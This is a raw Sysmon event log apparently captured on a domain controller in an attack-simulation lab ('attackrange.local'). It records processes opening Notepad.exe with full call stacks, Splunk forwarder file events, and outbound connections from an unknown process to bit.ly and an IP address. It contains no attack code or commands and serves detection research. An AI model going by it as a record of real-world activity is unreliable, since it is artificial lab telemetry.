22:53:35.930{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000001695642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.929{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2) 10341000x80000000000000001695641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.929{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03) 23542300x80000000000000001695640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.895{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0484048EF8E3433B29D2DE83BE6C1C6A,SHA256=6CF07A276E0293F8B2999E7D789D57D052058B59E1022B6C28A0475C51923E63,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.833{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+5d48a|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4B82) 10341000x80000000000000001695638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.833{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5d478|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978) 10341000x80000000000000001695637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.833{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5d478|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4B82) 354300x80000000000000001695636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:26.964{00000000-0000-0000-0000-000000000000}7076<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local55122-false104.23.99.190-443https 354300x80000000000000001695635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:26.836{00000000-0000-0000-0000-000000000000}7076<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local55120-false67.199.248.10bit.ly80http 23542300x80000000000000001695634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.707{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B50D5F040E4D0C31E75330995E7B99,SHA256=3A008BAAA76FCCD3E4D8F5CA69DCD71C9DE76647A7A3916FAFB526F8E80C8F25,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57967260C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57967260C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57967260C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57967260C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.645{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.633{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.598{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.598{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.582{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.582{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.582{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.582{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.582{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 